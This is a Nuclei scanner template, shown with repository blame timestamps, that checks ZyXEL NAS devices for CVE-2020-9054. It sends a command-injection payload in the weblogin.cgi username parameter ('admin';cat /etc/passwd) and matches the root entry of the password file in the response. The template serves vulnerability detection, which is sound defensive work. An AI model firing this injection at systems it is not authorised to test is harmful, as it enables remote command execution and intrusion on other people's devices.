nuclei-templates/cves/2020/CVE-2020-9054.yaml

23 lines
446 B
YAML
Raw Normal View History

2021-05-01 10:45:03 +00:00
id: CVE-2020-9054
info:
name: ZyXEL NAS RCE
author: dhiyaneshDk
severity: critical
2021-05-02 11:37:30 +00:00
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9054
tags: cve,cve2020,rce
2021-05-01 10:45:03 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"